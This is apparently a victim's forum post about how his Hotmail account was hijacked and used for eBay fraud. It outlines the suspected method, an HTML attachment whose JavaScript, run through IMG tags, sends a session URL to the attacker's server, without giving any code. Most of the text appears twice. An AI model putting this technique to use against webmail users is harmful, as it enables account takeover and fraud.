Some guy hijacked my hotmail account.. He then used it to reset my password at eBay (which was then sent to my hotmail account) then started listing a bunch of items (telling people to send him payment at Romania)..
I'm lucky that one of the bidders actually called me on the phone and let me know.. I was able to minimize the damage but two did get through..
Here's my theory of operation on how he hijacked my Hotmail account..
1) He sent me an e-mail with an "html" attachment (yes, HTML) ( I viewed it using Outlook Express - latest version with all updates)
2) The person then sends me another e-mail, asking if I opened the attachment.
3) Note that when one clicks on an attachment using Outlook Express (from hotmail), it opens up a browser window to hotmail so that one can view the attachment.
4) His god darned HTML attachment is not without a malicious payload - It has JavaScript that runs (while I'm on hotmail) due to <IMG> tags
5) He used the URL within the javascript as a HTTP request parameter directed to one of his servers.
The rest, you already know..
I will be filing a security report with Hotmail report tommorow, along with Microsoft to detail my findings..
Such a simple method too I guess we need to be carefull even when opening up HTML attachments.
George
I'm lucky that one of the bidders actually called me on the phone and let me know.. I was able to minimize the damage but two did get through..
Here's my theory of operation on how he hijacked my Hotmail account..
1) He sent me an e-mail with an "html" attachment (yes, HTML) ( I viewed it using Outlook Express - latest version with all updates)
2) The person then sends me another e-mail, asking if I opened the attachment.
3) Note that when one clicks on an attachment using Outlook Express (from hotmail), it opens up a browser window to hotmail so that one can view the attachment.
4) His god darned HTML attachment is not without a malicious payload - It has JavaScript that runs (while I'm on hotmail) due to <IMG> tags
5) He used the URL within the javascript as a HTTP request parameter directed to one of his servers.
The rest, you already know..
I will be filing a security report with Hotmail report tommorow, along with Microsoft to detail my findings..
Such a simple method too I guess we need to be carefull even when opening up HTML attachments.
George